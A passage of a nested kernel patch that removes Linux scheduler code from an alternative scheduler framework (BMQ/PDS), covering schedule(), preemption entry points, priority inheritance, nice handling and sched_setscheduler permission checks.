-+#ifdef CONFIG_SCHED_DEBUG
-+	rq->last_seen_need_resched_ns = 0;
-+#endif
-+
-+	if (likely(prev != next)) {
-+		if (deactivated)
-+			update_sched_preempt_mask(rq);
-+		next->last_ran = rq->clock_task;
-+		rq->last_ts_switch = rq->clock;
-+
-+		rq->nr_switches++;
-+		/*
-+		 * RCU users of rcu_dereference(rq->curr) may not see
-+		 * changes to task_struct made by pick_next_task().
-+		 */
-+		RCU_INIT_POINTER(rq->curr, next);
-+		/*
-+		 * The membarrier system call requires each architecture
-+		 * to have a full memory barrier after updating
-+		 * rq->curr, before returning to user-space.
-+		 *
-+		 * Here are the schemes providing that barrier on the
-+		 * various architectures:
-+		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
-+		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
-+		 * - finish_lock_switch() for weakly-ordered
-+		 *   architectures where spin_unlock is a full barrier,
-+		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
-+		 *   is a RELEASE barrier),
-+		 */
-+		++*switch_count;
-+
-+		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
-+
-+		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
-+
-+		/* Also unlocks the rq: */
-+		rq = context_switch(rq, prev, next);
-+	} else {
-+		__balance_callbacks(rq);
-+		raw_spin_unlock_irq(&rq->lock);
-+	}
-+
-+#ifdef CONFIG_SCHED_SMT
-+	sg_balance(rq);
-+#endif
-+}
-+
-+void __noreturn do_task_dead(void)
-+{
-+	/* Causes final put_task_struct in finish_task_switch(): */
-+	set_special_state(TASK_DEAD);
-+
-+	/* Tell freezer to ignore us: */
-+	current->flags |= PF_NOFREEZE;
-+
-+	__schedule(SM_NONE);
-+	BUG();
-+
-+	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
-+	for (;;)
-+		cpu_relax();
-+}
-+
-+static inline void sched_submit_work(struct task_struct *tsk)
-+{
-+	unsigned int task_flags;
-+
-+	if (task_is_running(tsk))
-+		return;
-+
-+	task_flags = tsk->flags;
-+	/*
-+	 * If a worker goes to sleep, notify and ask workqueue whether it
-+	 * wants to wake up a task to maintain concurrency.
-+	 */
-+	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (task_flags & PF_WQ_WORKER)
-+			wq_worker_sleeping(tsk);
-+		else
-+			io_wq_worker_sleeping(tsk);
-+	}
-+
-+	/*
-+	 * spinlock and rwlock must not flush block requests.  This will
-+	 * deadlock if the callback attempts to acquire a lock which is
-+	 * already acquired.
-+	 */
-+	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
-+
-+	/*
-+	 * If we are going to sleep and we have plugged IO queued,
-+	 * make sure to submit it to avoid deadlocks.
-+	 */
-+	blk_flush_plug(tsk->plug, true);
-+}
-+
-+static void sched_update_worker(struct task_struct *tsk)
-+{
-+	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (tsk->flags & PF_WQ_WORKER)
-+			wq_worker_running(tsk);
-+		else
-+			io_wq_worker_running(tsk);
-+	}
-+}
-+
-+asmlinkage __visible void __sched schedule(void)
-+{
-+	struct task_struct *tsk = current;
-+
-+	sched_submit_work(tsk);
-+	do {
-+		preempt_disable();
-+		__schedule(SM_NONE);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+	sched_update_worker(tsk);
-+}
-+EXPORT_SYMBOL(schedule);
-+
-+/*
-+ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
-+ * state (have scheduled out non-voluntarily) by making sure that all
-+ * tasks have either left the run queue or have gone into user space.
-+ * As idle tasks do not do either, they must not ever be preempted
-+ * (schedule out non-voluntarily).
-+ *
-+ * schedule_idle() is similar to schedule_preempt_disable() except that it
-+ * never enables preemption because it does not call sched_submit_work().
-+ */
-+void __sched schedule_idle(void)
-+{
-+	/*
-+	 * As this skips calling sched_submit_work(), which the idle task does
-+	 * regardless because that function is a nop when the task is in a
-+	 * TASK_RUNNING state, make sure this isn't used someplace that the
-+	 * current task can be in any other state. Note, idle is always in the
-+	 * TASK_RUNNING state.
-+	 */
-+	WARN_ON_ONCE(current->__state);
-+	do {
-+		__schedule(SM_NONE);
-+	} while (need_resched());
-+}
-+
-+#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
-+asmlinkage __visible void __sched schedule_user(void)
-+{
-+	/*
-+	 * If we come here after a random call to set_need_resched(),
-+	 * or we have been woken up remotely but the IPI has not yet arrived,
-+	 * we haven't yet exited the RCU idle mode. Do it here manually until
-+	 * we find a better solution.
-+	 *
-+	 * NB: There are buggy callers of this function.  Ideally we
-+	 * should warn if prev_state != CONTEXT_USER, but that will trigger
-+	 * too frequently to make sense yet.
-+	 */
-+	enum ctx_state prev_state = exception_enter();
-+	schedule();
-+	exception_exit(prev_state);
-+}
-+#endif
-+
-+/**
-+ * schedule_preempt_disabled - called with preemption disabled
-+ *
-+ * Returns with preemption disabled. Note: preempt_count must be 1
-+ */
-+void __sched schedule_preempt_disabled(void)
-+{
-+	sched_preempt_enable_no_resched();
-+	schedule();
-+	preempt_disable();
-+}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+void __sched notrace schedule_rtlock(void)
-+{
-+	do {
-+		preempt_disable();
-+		__schedule(SM_RTLOCK_WAIT);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+}
-+NOKPROBE_SYMBOL(schedule_rtlock);
-+#endif
-+
-+static void __sched notrace preempt_schedule_common(void)
-+{
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		__schedule(SM_PREEMPT);
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+
-+		/*
-+		 * Check again in case we missed a preemption opportunity
-+		 * between schedule and now.
-+		 */
-+	} while (need_resched());
-+}
-+
-+#ifdef CONFIG_PREEMPTION
-+/*
-+ * This is the entry point to schedule() from in-kernel preemption
-+ * off of preempt_enable.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule(void)
-+{
-+	/*
-+	 * If there is a non-zero preempt_count or interrupts are disabled,
-+	 * we do not want to preempt the current task. Just return..
-+	 */
-+	if (likely(!preemptible()))
-+		return;
-+
-+	preempt_schedule_common();
-+}
-+NOKPROBE_SYMBOL(preempt_schedule);
-+EXPORT_SYMBOL(preempt_schedule);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_dynamic_enabled
-+#define preempt_schedule_dynamic_enabled	preempt_schedule
-+#define preempt_schedule_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
-+void __sched notrace dynamic_preempt_schedule(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
-+		return;
-+	preempt_schedule();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule);
-+EXPORT_SYMBOL(dynamic_preempt_schedule);
-+#endif
-+#endif
-+
-+/**
-+ * preempt_schedule_notrace - preempt_schedule called by tracing
-+ *
-+ * The tracing infrastructure uses preempt_enable_notrace to prevent
-+ * recursion and tracing preempt enabling caused by the tracing
-+ * infrastructure itself. But as tracing can happen in areas coming
-+ * from userspace or just about to enter userspace, a preempt enable
-+ * can occur before user_exit() is called. This will cause the scheduler
-+ * to be called when the system is still in usermode.
-+ *
-+ * To prevent this, the preempt_enable_notrace will use this function
-+ * instead of preempt_schedule() to exit user context if needed before
-+ * calling the scheduler.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
-+{
-+	enum ctx_state prev_ctx;
-+
-+	if (likely(!preemptible()))
-+		return;
-+
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		/*
-+		 * Needs preempt disabled in case user_exit() is traced
-+		 * and the tracer calls preempt_enable_notrace() causing
-+		 * an infinite recursion.
-+		 */
-+		prev_ctx = exception_enter();
-+		__schedule(SM_PREEMPT);
-+		exception_exit(prev_ctx);
-+
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+	} while (need_resched());
-+}
-+EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_notrace_dynamic_enabled
-+#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
-+#define preempt_schedule_notrace_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
-+void __sched notrace dynamic_preempt_schedule_notrace(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
-+		return;
-+	preempt_schedule_notrace();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
-+EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
-+#endif
-+#endif
-+
-+#endif /* CONFIG_PREEMPTION */
-+
-+/*
-+ * This is the entry point to schedule() from kernel preemption
-+ * off of irq context.
-+ * Note, that this is called and return with irqs disabled. This will
-+ * protect us against recursive calling from irq.
-+ */
-+asmlinkage __visible void __sched preempt_schedule_irq(void)
-+{
-+	enum ctx_state prev_state;
-+
-+	/* Catch callers which need to be fixed */
-+	BUG_ON(preempt_count() || !irqs_disabled());
-+
-+	prev_state = exception_enter();
-+
-+	do {
-+		preempt_disable();
-+		local_irq_enable();
-+		__schedule(SM_PREEMPT);
-+		local_irq_disable();
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+
-+	exception_exit(prev_state);
-+}
-+
-+int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
-+			  void *key)
-+{
-+	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
-+	return try_to_wake_up(curr->private, mode, wake_flags);
-+}
-+EXPORT_SYMBOL(default_wake_function);
-+
-+static inline void check_task_changed(struct task_struct *p, struct rq *rq)
-+{
-+	int idx;
-+
-+	/* Trigger resched if task sched_prio has been modified. */
-+	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
-+		requeue_task(p, rq, idx);
-+		check_preempt_curr(rq);
-+	}
-+}
-+
-+static void __setscheduler_prio(struct task_struct *p, int prio)
-+{
-+	p->prio = prio;
-+}
-+
-+#ifdef CONFIG_RT_MUTEXES
-+
-+static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
-+{
-+	if (pi_task)
-+		prio = min(prio, pi_task->prio);
-+
-+	return prio;
-+}
-+
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	struct task_struct *pi_task = rt_mutex_get_top_task(p);
-+
-+	return __rt_effective_prio(pi_task, prio);
-+}
-+
-+/*
-+ * rt_mutex_setprio - set the current priority of a task
-+ * @p: task to boost
-+ * @pi_task: donor task
-+ *
-+ * This function changes the 'effective' priority of a task. It does
-+ * not touch ->normal_prio like __setscheduler().
-+ *
-+ * Used by the rt_mutex code to implement priority inheritance
-+ * logic. Call site only calls if the priority of the task changed.
-+ */
-+void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
-+{
-+	int prio;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	/* XXX used to be waiter->prio, not waiter->task->prio */
-+	prio = __rt_effective_prio(pi_task, p->normal_prio);
-+
-+	/*
-+	 * If nothing changed; bail early.
-+	 */
-+	if (p->pi_top_task == pi_task && prio == p->prio)
-+		return;
-+
-+	rq = __task_access_lock(p, &lock);
-+	update_rq_clock(rq);
-+	/*
-+	 * Set under pi_lock && rq->lock, such that the value can be used under
-+	 * either lock.
-+	 *
-+	 * Note that there is loads of tricky to make this pointer cache work
-+	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
-+	 * ensure a task is de-boosted (pi_task is set to NULL) before the
-+	 * task is allowed to run again (and can exit). This ensures the pointer
-+	 * points to a blocked task -- which guarantees the task is present.
-+	 */
-+	p->pi_top_task = pi_task;
-+
-+	/*
-+	 * For FIFO/RR we only need to set prio, if that matches we're done.
-+	 */
-+	if (prio == p->prio)
-+		goto out_unlock;
-+
-+	/*
-+	 * Idle task boosting is a nono in general. There is one
-+	 * exception, when PREEMPT_RT and NOHZ is active:
-+	 *
-+	 * The idle task calls get_next_timer_interrupt() and holds
-+	 * the timer wheel base->lock on the CPU and another CPU wants
-+	 * to access the timer (probably to cancel it). We can safely
-+	 * ignore the boosting request, as the idle CPU runs this code
-+	 * with interrupts disabled and will complete the lock
-+	 * protected section without being interrupted. So there is no
-+	 * real need to boost.
-+	 */
-+	if (unlikely(p == rq->idle)) {
-+		WARN_ON(p != rq->curr);
-+		WARN_ON(p->pi_blocked_on);
-+		goto out_unlock;
-+	}
-+
-+	trace_sched_pi_setprio(p, pi_task);
-+
-+	__setscheduler_prio(p, prio);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+
-+	__balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+
-+	preempt_enable();
-+}
-+#else
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	return prio;
-+}
-+#endif
-+
-+void set_user_nice(struct task_struct *p, long nice)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
-+		return;
-+	/*
-+	 * We have to be careful, if called from sys_setpriority(),
-+	 * the task might be in the middle of scheduling on another CPU.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	p->static_prio = NICE_TO_PRIO(nice);
-+	/*
-+	 * The RT priorities are set via sched_setscheduler(), but we still
-+	 * allow the 'normal' nice value to be set - but as expected
-+	 * it won't have any effect on scheduling until the task is
-+	 * not SCHED_NORMAL/SCHED_BATCH:
-+	 */
-+	if (task_has_rt_policy(p))
-+		goto out_unlock;
-+
-+	p->prio = effective_prio(p);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+EXPORT_SYMBOL(set_user_nice);
-+
-+/*
-+ * is_nice_reduction - check if nice value is an actual reduction
-+ *
-+ * Similar to can_nice() but does not perform a capability check.
-+ *
-+ * @p: task
-+ * @nice: nice value
-+ */
-+static bool is_nice_reduction(const struct task_struct *p, const int nice)
-+{
-+	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
-+	int nice_rlim = nice_to_rlimit(nice);
-+
-+	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
-+}
-+
-+/*
-+ * can_nice - check if a task can reduce its nice value
-+ * @p: task
-+ * @nice: nice value
-+ */
-+int can_nice(const struct task_struct *p, const int nice)
-+{
-+	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
-+}
-+
-+#ifdef __ARCH_WANT_SYS_NICE
-+
-+/*
-+ * sys_nice - change the priority of the current process.
-+ * @increment: priority increment
-+ *
-+ * sys_setpriority is a more generic, but much slower function that
-+ * does similar things.
-+ */
-+SYSCALL_DEFINE1(nice, int, increment)
-+{
-+	long nice, retval;
-+
-+	/*
-+	 * Setpriority might change our priority at the same moment.
-+	 * We don't have to worry. Conceptually one call occurs first
-+	 * and we have a single winner.
-+	 */
-+
-+	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
-+	nice = task_nice(current) + increment;
-+
-+	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
-+	if (increment < 0 && !can_nice(current, nice))
-+		return -EPERM;
-+
-+	retval = security_task_setnice(current, nice);
-+	if (retval)
-+		return retval;
-+
-+	set_user_nice(current, nice);
-+	return 0;
-+}
-+
-+#endif
-+
-+/**
-+ * task_prio - return the priority value of a given task.
-+ * @p: the task in question.
-+ *
-+ * Return: The priority value as seen by users in /proc.
-+ *
-+ * sched policy         return value   kernel prio    user prio/nice
-+ *
-+ * (BMQ)normal, batch, idle[0 ... 53]  [100 ... 139]          0/[-20 ... 19]/[-7 ... 7]
-+ * (PDS)normal, batch, idle[0 ... 39]            100          0/[-20 ... 19]
-+ * fifo, rr             [-1 ... -100]     [99 ... 0]  [0 ... 99]
-+ */
-+int task_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
-+		task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+/**
-+ * idle_cpu - is a given CPU idle currently?
-+ * @cpu: the processor in question.
-+ *
-+ * Return: 1 if the CPU is currently idle. 0 otherwise.
-+ */
-+int idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (rq->curr != rq->idle)
-+		return 0;
-+
-+	if (rq->nr_running)
-+		return 0;
-+
-+#ifdef CONFIG_SMP
-+	if (rq->ttwu_pending)
-+		return 0;
-+#endif
-+
-+	return 1;
-+}
-+
-+/**
-+ * idle_task - return the idle task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * Return: The idle task for the cpu @cpu.
-+ */
-+struct task_struct *idle_task(int cpu)
-+{
-+	return cpu_rq(cpu)->idle;
-+}
-+
-+/**
-+ * find_process_by_pid - find a process with a matching PID value.
-+ * @pid: the pid in question.
-+ *
-+ * The task of @pid, if found. %NULL otherwise.
-+ */
-+static inline struct task_struct *find_process_by_pid(pid_t pid)
-+{
-+	return pid ? find_task_by_vpid(pid) : current;
-+}
-+
-+/*
-+ * sched_setparam() passes in -1 for its policy, to let the functions
-+ * it calls know not to change it.
-+ */
-+#define SETPARAM_POLICY -1
-+
-+static void __setscheduler_params(struct task_struct *p,
-+		const struct sched_attr *attr)
-+{
-+	int policy = attr->sched_policy;
-+
-+	if (policy == SETPARAM_POLICY)
-+		policy = p->policy;
-+
-+	p->policy = policy;
-+
-+	/*
-+	 * allow normal nice value to be set, but will not have any
-+	 * effect on scheduling until the task not SCHED_NORMAL/
-+	 * SCHED_BATCH
-+	 */
-+	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
-+
-+	/*
-+	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
-+	 * !rt_policy. Always setting this ensures that things like
-+	 * getparam()/getattr() don't report silly values for !rt tasks.
-+	 */
-+	p->rt_priority = attr->sched_priority;
-+	p->normal_prio = normal_prio(p);
-+}
-+
-+/*
-+ * check the target process has a UID that matches the current process's
-+ */
-+static bool check_same_owner(struct task_struct *p)
-+{
-+	const struct cred *cred = current_cred(), *pcred;
-+	bool match;
-+
-+	rcu_read_lock();
-+	pcred = __task_cred(p);
-+	match = (uid_eq(cred->euid, pcred->euid) ||
-+		 uid_eq(cred->euid, pcred->uid));
-+	rcu_read_unlock();
-+	return match;
-+}
-+
-+/*
-+ * Allow unprivileged RT tasks to decrease priority.
-+ * Only issue a capable test if needed and only once to avoid an audit
-+ * event on permitted non-privileged operations:
-+ */
-+static int user_check_sched_setscheduler(struct task_struct *p,
-+					 const struct sched_attr *attr,
-+					 int policy, int reset_on_fork)
-+{
-+	if (rt_policy(policy)) {
-+		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
-+
-+		/* Can't set/change the rt policy: */
-+		if (policy != p->policy && !rlim_rtprio)
-+			goto req_priv;
-+
-+		/* Can't increase priority: */
-+		if (attr->sched_priority > p->rt_priority &&
-+		    attr->sched_priority > rlim_rtprio)
-+			goto req_priv;
-+	}
-+
-+	/* Can't change other user's priorities: */
-+	if (!check_same_owner(p))
-+		goto req_priv;
-+
-+	/* Normal users shall not reset the sched_reset_on_fork flag: */
-+	if (p->sched_reset_on_fork && !reset_on_fork)
-+		goto req_priv;
-+
-+	return 0;
-+
-+req_priv:
-+	if (!capable(CAP_SYS_NICE))
-+		return -EPERM;
-+
-+	return 0;
-+}
-+
-+static int __sched_setscheduler(struct task_struct *p,
-+				const struct sched_attr *attr,
-+				bool user, bool pi)
-+{
-+	const struct sched_attr dl_squash_attr = {
-+		.size		= sizeof(struct sched_attr),
-+		.sched_policy	= SCHED_FIFO,
-+		.sched_nice	= 0,
-+		.sched_priority = 99,
-+	};
-+	int oldpolicy = -1, policy = attr->sched_policy;
-+	int retval, newprio;
-+	struct balance_callback *head;
-+	unsigned long flags;
-+	struct rq *rq;
-+	int reset_on_fork;
-+	raw_spinlock_t *lock;
-+
-+	/* The pi code expects interrupts enabled */
-+	BUG_ON(pi && in_interrupt());
-+
-+	/*
-+	 * Alt schedule FW supports SCHED_DEADLINE by squash it as prio 0 SCHED_FIFO
-+	 */
-+	if (unlikely(SCHED_DEADLINE == policy)) {
-+		attr = &dl_squash_attr;
-+		policy = attr->sched_policy;
-+	}
-+recheck:
-+	/* Double check policy once rq lock held */
-+	if (policy < 0) {
-+		reset_on_fork = p->sched_reset_on_fork;
-+		policy = oldpolicy = p->policy;
-+	} else {
-+		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
-+
-+		if (policy > SCHED_IDLE)
-+			return -EINVAL;
-+	}
-+
-+	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
-+		return -EINVAL;
-+
-+	/*
-+	 * Valid priorities for SCHED_FIFO and SCHED_RR are
-+	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
-+	 * SCHED_BATCH and SCHED_IDLE is 0.
-+	 */
-+	if (attr->sched_priority < 0 ||
-+	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
-+	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
-+		return -EINVAL;
-+	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
-+	    (attr->sched_priority != 0))
-+		return -EINVAL;
-+
-+	if (user) {
-+		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
-+		if (retval)
-+			return retval;
-+
-+		retval = security_task_setscheduler(p);
-+		if (retval)
-+			return retval;
-+	}
-+
-+	if (pi)
-+		cpuset_read_lock();
-+
-+	/*
-+	 * Make sure no PI-waiters arrive (or leave) while we are
-+	 * changing the priority of the task:
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+
-+	/*
-+	 * To be able to change p->policy safely, task_access_lock()
-+	 * must be called.
-+	 * IF use task_access_lock() here:
-+	 * For the task p which is not running, reading rq->stop is
-+	 * racy but acceptable as ->stop doesn't change much.
-+	 * An enhancemnet can be made to read rq->stop saftly.
-+	 */
-+	rq = __task_access_lock(p, &lock);
-+
-+	/*
-+	 * Changing the policy of the stop threads its a very bad idea
-+	 */
-+	if (p == rq->stop) {
-+		retval = -EINVAL;
-+		goto unlock;
-+	}
-+
-+	/*
-+	 * If not changing anything there's no need to proceed further:
-+	 */
-+	if (unlikely(policy == p->policy)) {
-+		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
-+			goto change;
-+		if (!rt_policy(policy) &&
-+		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
-+			goto change;
-+
-+		p->sched_reset_on_fork = reset_on_fork;
-+		retval = 0;
-+		goto unlock;
-+	}
-+change:
-+
-+	/* Re-check policy now with rq lock held */
-+	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
-+		policy = oldpolicy = -1;
-+		__task_access_unlock(p, lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+		if (pi)
-+			cpuset_read_unlock();
-+		goto recheck;
-+	}
-+
-+	p->sched_reset_on_fork = reset_on_fork;
-+
-+	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
-+	if (pi) {
-+		/*
-+		 * Take priority boosted tasks into account. If the new
-+		 * effective priority is unchanged, we just store the new
-+		 * normal parameters and do not touch the scheduler class and
-+		 * the runqueue. This will be done when the task deboost
-+		 * itself.
-+		 */
-+		newprio = rt_effective_prio(p, newprio);
-+	}
-+
-+	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
-+		__setscheduler_params(p, attr);
-+		__setscheduler_prio(p, newprio);
-+	}
-+
-+	check_task_changed(p, rq);
-+
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+	head = splice_balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	if (pi) {
-+		cpuset_read_unlock();
-+		rt_mutex_adjust_pi(p);
-+	}
-+
-+	/* Run balance callbacks after we've adjusted the PI chain: */
-+	balance_callbacks(rq, head);
-+	preempt_enable();
-+
-+	return 0;
-+
-+unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+	if (pi)
-+		cpuset_read_unlock();
-+	return retval;
-+}
-+
-+static int _sched_setscheduler(struct task_struct *p, int policy,
-+			       const struct sched_param *param, bool check)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy   = policy,
-+		.sched_priority = param->sched_priority,
-+		.sched_nice     = PRIO_TO_NICE(p->static_prio),
-+	};
-+
-+	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
-+	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
-+		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+		policy &= ~SCHED_RESET_ON_FORK;
-+		attr.sched_policy = policy;
-+	}
-+
-+	return __sched_setscheduler(p, &attr, check, true);
-+}
-+
-+/**
-+ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Use sched_set_fifo(), read its comment.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ *
-+ * NOTE that the task may be already dead.
-+ */
-+int sched_setscheduler(struct task_struct *p, int policy,
-+		       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, true);
-+}
-+
-+int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, true, true);
-+}
-+
-+int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, false, true);
-+}
-+EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
-+
-+/**
-+ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Just like sched_setscheduler, only don't bother checking if the
-+ * current context has permission.  For example, this is needed in
-+ * stop_machine(): we create temporary high priority worker threads,
-+ * but our caller might not have that capability.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+int sched_setscheduler_nocheck(struct task_struct *p, int policy,
-+			       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, false);
-+}
-+
-+/*
-+ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
-+ * incapable of resource management, which is the one thing an OS really should
-+ * be doing.
-+ *
-+ * This is of course the reason it is limited to privileged users only.
-+ *
-+ * Worse still; it is fundamentally impossible to compose static priority
-+ * workloads. You cannot take two correctly working static prio workloads
-+ * and smash them together and still expect them to work.
-+ *
-+ * For this reason 'all' FIFO tasks the kernel creates are basically at:
-+ *
-+ *   MAX_RT_PRIO / 2
-+ *
-+ * The administrator _MUST_ configure the system, the kernel simply doesn't
-+ * know enough information to make a sensible choice.
-+ */
-+void sched_set_fifo(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo);
-+
-+/*
-+ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
-+ */
-+void sched_set_fifo_low(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = 1 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo_low);
-+
-+void sched_set_normal(struct task_struct *p, int nice)
-+{
-+	struct sched_attr attr = {
